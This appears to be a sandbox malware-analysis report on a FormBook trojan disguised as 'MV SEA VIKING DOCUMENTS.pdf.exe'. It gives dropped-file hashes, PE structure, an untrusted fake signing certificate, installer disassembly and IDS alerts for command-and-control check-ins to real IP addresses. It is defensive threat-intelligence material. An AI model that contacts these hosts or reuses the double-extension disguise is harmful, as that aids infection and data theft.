C:\Users\user\AppData\Local\Temp\cliconfg.dll | MV SEA VIKING DOCUMENTS.pdf.exe | malicious

Process:C:\Windows\SysWOW64\cmd.exe
File Type:SQLite 3.x database, last written using SQLite version 3036000
Category:dropped
Size (bytes):45056
Entropy (8bit):0.7853305971874845
Encrypted:false
SSDEEP:48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
MD5:00C036C61F625BF9D25362B9BE24ADEB
SHA1:6738C3D037E4A2E9F41B1398BA88E5771532F593
SHA-256:0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
SHA-512:711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
Malicious:false

Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):628784
Entropy (8bit):7.669364566747911
Encrypted:false
SSDEEP:12288:9b6UG1NAN8Axjam22QMPnJjUisvEe/8dUMq2PZgue0yzgX3GXUe:9bm1YfV2vhvEeUdUgPZgpgXWXR
MD5:319860D181378BF868E4DEEDCF5FBFB6
SHA1:CF91EFDA8BDBA4674CB72D33CE391241EC4B9678
SHA-256:58F1715336D2B7478C4539589DFC2065B3201DF5505756474E00636B432CB378
SHA-512:F27D1C40321D87043BDFC5FB8A6B8B049D2C0CB15AD32CF9518E45875C1DA225D25DE19BB9D58588EC47BBAC900342ED8C5A732C9131EA558A6AE6682CB783E7
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 14%
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):80902
                                                                                                                                                                                                                              Entropy (8bit):5.976267305529194
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:jROzIZ2BBjXU7otVipiINRcjHLazNO9z8Ul58:lOzIZ2BpXU7oHyx6ANYt58
                                                                                                                                                                                                                              MD5:F610642FCF0D4FB10E1D6E92BAB1C03C
                                                                                                                                                                                                                              SHA1:EE2B377B460FE13059E7E86DAF25AB702457D4F7
                                                                                                                                                                                                                              SHA-256:759808B739C0BA9D5FC1FFDF0A1F93F23CF4AD0A2C58174D35B7521B298BAA7A
                                                                                                                                                                                                                              SHA-512:3A9B33292DF407EB5DD0EA094E8CA57CAA59623A64C729F982D98B8B5FE209F3AB33E96A74140D2282BC2C9FF29571AD811A24F3C319C215E8CBB60E9584E135
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):78336
                                                                                                                                                                                                                              Entropy (8bit):5.26970327331065
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:NrVe9TYPg/NGXIQgD78A5A/33EcLl3Je8yu9SDWCZ3PrIfd+8Ec:NBDgwXIFD78A5O3EchtC3PrIfd+f
                                                                                                                                                                                                                              MD5:5AE732C0CBD2DE4157BA6273579DB241
                                                                                                                                                                                                                              SHA1:77724558F2B36644D9DBB228D5A6000BB26D6666
                                                                                                                                                                                                                              SHA-256:BB1C2BD6E5BF047077C0EE742CDAC75BC89F212C47610CF1B2F2F1755F0A4F8B
                                                                                                                                                                                                                              SHA-512:46243CE749A2DB2D1965CC7AD783A84AA317B0E129B894AE2BAEC652AE18D7D4D7FD193F86610E9021DB979C9993C0958B60275EC05A0540BBB8973E4D79C536
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                              • Filename: MV SEA VIKING DOCUMENTS.pdf.exe, Detection: malicious
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                                              Entropy (8bit):5.814115788739565
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                                                                                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                                                                                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                                                                                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                                                                                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                              • Filename: MV SEA VIKING DOCUMENTS.pdf.exe, Detection: malicious
                                                                                                                                                                                                                              • Filename: IMG140202214020221402022.exe, Detection: malicious
                                                                                                                                                                                                                              • Filename: Liquidacin por Factorizacin de Crditos.exe, Detection: malicious
                                                                                                                                                                                                                              • Filename: 36PzmSKXoT.exe, Detection: malicious
                                                                                                                                                                                                                              • Filename: TNT Invoice 21-02-2022#U00b7pdf.exe, Detection: malicious
                                                                                                                                                                                                                              • Filename: Order (965155).exe, Detection: malicious
                                                                                                                                                                                                                              • Filename: b4#Uc6a9.exe, Detection: malicious
                                                                                                                                                                                                                              • Filename: CDH_0302 pdf.exe, Detection: malicious
                                                                                                                                                                                                                              • Filename: OFERTA ALSSET.exe, Detection: malicious
                                                                                                                                                                                                                              • Filename: Invitation To Quote 17-02-2022#U00b7pdf.exe, Detection: malicious
                                                                                                                                                                                                                              • Filename: Invitation to Quote 17-02-2022#U00b7pdf.exe, Detection: malicious
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                                              Entropy (8bit):5.814115788739565
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                                                                                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                                                                                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                                                                                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                                                                                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):77824
                                                                                                                                                                                                                              Entropy (8bit):6.364683853724386
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:7U1N+pZS+NBd67ZRLrrqJpjunm/8KOjNPZJ9VQ8Q:7s+pZSsBd6PnWr6m/8djNPH9VQ8
                                                                                                                                                                                                                              MD5:F5AA22E7A259F9A7BCA1A12A9AE9B9B3
                                                                                                                                                                                                                              SHA1:AE369814DEDF19BA0E362C1885105B84A7F0CB1E
                                                                                                                                                                                                                              SHA-256:2279DCBFA306679DFC5E47F9E173ABA222E01097E1D8D8FDDB8740595ABFAE0E
                                                                                                                                                                                                                              SHA-512:CC50D6447FE3056435A8E291D7ABA7B57B9E1C21A200371170CB7BC81048F29AE4B73E57F0926011FA95B1E51872A3E981A1AB43B4301EBAAE6BBD3DCB52BA4A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):77824
                                                                                                                                                                                                                              Entropy (8bit):6.315462687965154
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:O/ZLBKJn6SdpC5fmd/cdCN92bmFHfA96O8P8P5QF7NkQyUpyN9E233ITQB0o9:No5fmt72bmFHfUZ8PkP9E234kB0
                                                                                                                                                                                                                              MD5:5A7F3388AB710A50648B5E2F1F651EF5
                                                                                                                                                                                                                              SHA1:5DE0CC2FC29E1EAFD0490E9FDB4D78298268B134
                                                                                                                                                                                                                              SHA-256:04975AECF94039D1CD1C207EBDCE948D6D2C9323CAEF02F6D4568D7CAD8427CD
                                                                                                                                                                                                                              SHA-512:EABCC39F395B6EAC02FCDC4264F91E77DC755E95DC0F2B0C190527F2266AFE722C5DE5D745748B55CBA5278B5F1FF776D2BF3A66C273578B361E9E509C8D5A5E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):77824
                                                                                                                                                                                                                              Entropy (8bit):6.564995553201286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:RE1p5jTZWpwLrCziIK8+wv/O50y5FE2bdEGcToZAD56k8:RE1pPL2zHoytG5dHJZE5d8
                                                                                                                                                                                                                              MD5:A7209ABD666D34E18CD5FC85D2435A03
                                                                                                                                                                                                                              SHA1:69A007F51EA2827E507FA3867B1B637E0A450EC2
                                                                                                                                                                                                                              SHA-256:B11EDB8F9B5D238DFBBAE316D0DA72E1006B6B24DD57C8B879428F5ADACFA0DF
                                                                                                                                                                                                                              SHA-512:1E508E928EFFE382D0667F71994C74610E0B2E24248E9AD84736942E8851E272FC62EE6F13C4E4B090B1A2BCC6F1487B667594488F47502DE2327D19F0497F32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                              Entropy (8bit):7.669364566747911
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                              File name:MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              File size:628784
                                                                                                                                                                                                                              MD5:319860d181378bf868e4deedcf5fbfb6
                                                                                                                                                                                                                              SHA1:cf91efda8bdba4674cb72d33ce391241ec4b9678
                                                                                                                                                                                                                              SHA256:58f1715336d2b7478c4539589dfc2065b3201df5505756474e00636b432cb378
                                                                                                                                                                                                                              SHA512:f27d1c40321d87043bdfc5fb8a6b8b049d2c0cb15ad32cf9518e45875c1da225d25de19bb9d58588ec47bbac900342ed8c5a732c9131ea558a6ae6682cb783e7
                                                                                                                                                                                                                              SSDEEP:12288:9b6UG1NAN8Axjam22QMPnJjUisvEe/8dUMq2PZgue0yzgX3GXUe:9bm1YfV2vhvEeUdUgPZgpgXWXR
                                                                                                                                                                                                                              Icon Hash:4406dccce4eadc0c
                                                                                                                                                                                                                              Entrypoint:0x40352d
                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                              Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                              Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                              Signature Issuer:E=UNDIATONICALLY@Anecdotic.pat, CN=Mdereferaternes, OU=Vllingerne, O=Universitetsboghandelens, L=HAEMOGREGARINA, S=Shadiness5, C=CX
                                                                                                                                                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                              Error Number:-2146762487
Not Before:21/02/2022 10:00:32
Not After:21/02/2023 10:00:32
                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                              • E=UNDIATONICALLY@Anecdotic.pat, CN=Mdereferaternes, OU=Vllingerne, O=Universitetsboghandelens, L=HAEMOGREGARINA, S=Shadiness5, C=CX
                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                              Thumbprint MD5:8BD2727F75CC84089DBA0C5875EE94DD
                                                                                                                                                                                                                              Thumbprint SHA-1:D30CE59FEAFC15F2FEA4F790EDF6A6E3F6879931
                                                                                                                                                                                                                              Thumbprint SHA-256:BFEC36B4E3B583BB9CA109C55DF9C9273FD158EDA306D770C86B805274D8542A
                                                                                                                                                                                                                              Serial:00
                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                              sub esp, 000003F4h
                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                                              xor ebx, ebx
                                                                                                                                                                                                                              push 00008001h
                                                                                                                                                                                                                              mov dword ptr [ebp-14h], ebx
                                                                                                                                                                                                                              mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                                                                                                                              mov dword ptr [ebp-10h], ebx
                                                                                                                                                                                                                              call dword ptr [004080CCh]
                                                                                                                                                                                                                              mov esi, dword ptr [004080D0h]
                                                                                                                                                                                                                              lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                              mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                                                                                                              mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                                                                                              mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FB40883FCBAh
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FB40883FC8Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00434FB8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4d000 | 0x5ade0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x982c0 | 0x1570 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x6897 | 0x6a00 | False | 0.666126179245 | data | 6.45839821493 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x14a6 | 0x1600 | False | 0.439275568182 | data | 5.02410928126 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x2b018 | 0x600 | False | 0.521484375 | data | 4.15458210409 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .ndata | 0x36000 | 0x17000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x4d000 | 0x5ade0 | 0x5ae00 | False | 0.845198052785 | data | 7.43894434396 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_ICON | 0x4d298 | 0x35e24 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States |
| RT_ICON | 0x830c0 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States |
| RT_ICON | 0x938e8 | 0xf928 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
| RT_ICON | 0xa3210 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295 | English | United States |
| RT_DIALOG | 0xa7438 | 0x100 | data | English | United States |
| RT_DIALOG | 0xa7538 | 0x11c | data | English | United States |
| RT_DIALOG | 0xa7658 | 0xc4 | data | English | United States |
| RT_DIALOG | 0xa7720 | 0x60 | data | English | United States |
| RT_GROUP_ICON | 0xa7780 | 0x3e | data | English | United States |
| RT_VERSION | 0xa77c0 | 0x2e0 | data | English | United States |
| RT_MANIFEST | 0xa7aa0 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States |

| DLL | Import |
|---|---|
| ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW |
| SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW |
| ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree |
| COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked |
| USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu |
| GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject |
| KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW |

| Description | Data |
|---|---|
| LegalCopyright | Copyright (C) 2016-2022 - All Rights Reserved |
| FileVersion | 2.2.0.0 |
| CompanyName | GiantDock |
| LegalTrademarks | Copyright (C) 2016-2022 - All Rights Reserved |
| Comments | GiantDock |
| ProductName | GiantDock |
| FileDescription | GiantDock |
| Translation | 0x0409 0x04b0 |

| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 02/21/22-16:51:29.980031 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49779 | 80 | 192.168.11.20 | 79.110.48.188 |
| 02/21/22-16:51:29.980031 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49779 | 80 | 192.168.11.20 | 79.110.48.188 |
| 02/21/22-16:51:29.980031 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49779 | 80 | 192.168.11.20 | 79.110.48.188 |
| 02/21/22-16:51:51.574671 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49785 | 80 | 192.168.11.20 | 54.154.44.39 |
| 02/21/22-16:51:51.574671 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49785 | 80 | 192.168.11.20 | 54.154.44.39 |
| 02/21/22-16:51:51.574671 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49785 | 80 | 192.168.11.20 | 54.154.44.39 |
| 02/21/22-16:52:22.997085 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49790 | 34.102.136.180 | 192.168.11.20 |
| 02/21/22-16:52:28.620803 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49791 | 80 | 192.168.11.20 | 45.195.115.71 |
| 02/21/22-16:52:28.620803 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49791 | 80 | 192.168.11.20 | 45.195.115.71 |
| 02/21/22-16:52:28.620803 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49791 | 80 | 192.168.11.20 | 45.195.115.71 |
| 02/21/22-16:52:34.286970 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49792 | 34.102.136.180 | 192.168.11.20 |
| 02/21/22-16:53:14.197622 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49796 | 34.102.136.180 | 192.168.11.20 |
| 02/21/22-16:53:24.591715 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49798 | 80 | 192.168.11.20 | 162.0.209.21 |
| 02/21/22-16:53:24.591715 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49798 | 80 | 192.168.11.20 | 162.0.209.21 |
| 02/21/22-16:53:24.591715 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49798 | 80 | 192.168.11.20 | 162.0.209.21 |
| 02/21/22-16:53:30.061606 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49799 | 34.102.136.180 | 192.168.11.20 |
| 02/21/22-16:53:35.418969 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49800 | 80 | 192.168.11.20 | 66.29.154.157 |
| 02/21/22-16:53:35.418969 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49800 | 80 | 192.168.11.20 | 66.29.154.157 |
| 02/21/22-16:53:35.418969 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49800 | 80 | 192.168.11.20 | 66.29.154.157 |
| 02/21/22-16:54:00.734732 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.11.20 | 1.1.1.1 |
| 02/21/22-16:54:22.287844 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49813 | 34.102.136.180 | 192.168.11.20 |
| 02/21/22-16:54:27.646806 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49815 | 80 | 192.168.11.20 | 45.195.115.71 |
| 02/21/22-16:54:27.646806 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49815 | 80 | 192.168.11.20 | 45.195.115.71 |
| 02/21/22-16:54:27.646806 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49815 | 80 | 192.168.11.20 | 45.195.115.71 |
| 02/21/22-16:54:33.300226 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49818 | 34.102.136.180 | 192.168.11.20 |
| 02/21/22-16:55:02.327734 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.11.20 | 1.1.1.1 |
| 02/21/22-16:55:02.336624 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49832 | 80 | 192.168.11.20 | 54.154.44.39 |
| 02/21/22-16:55:02.336624 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49832 | 80 | 192.168.11.20 | 54.154.44.39 |
| 02/21/22-16:55:02.336624 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49832 | 80 | 192.168.11.20 | 54.154.44.39 |
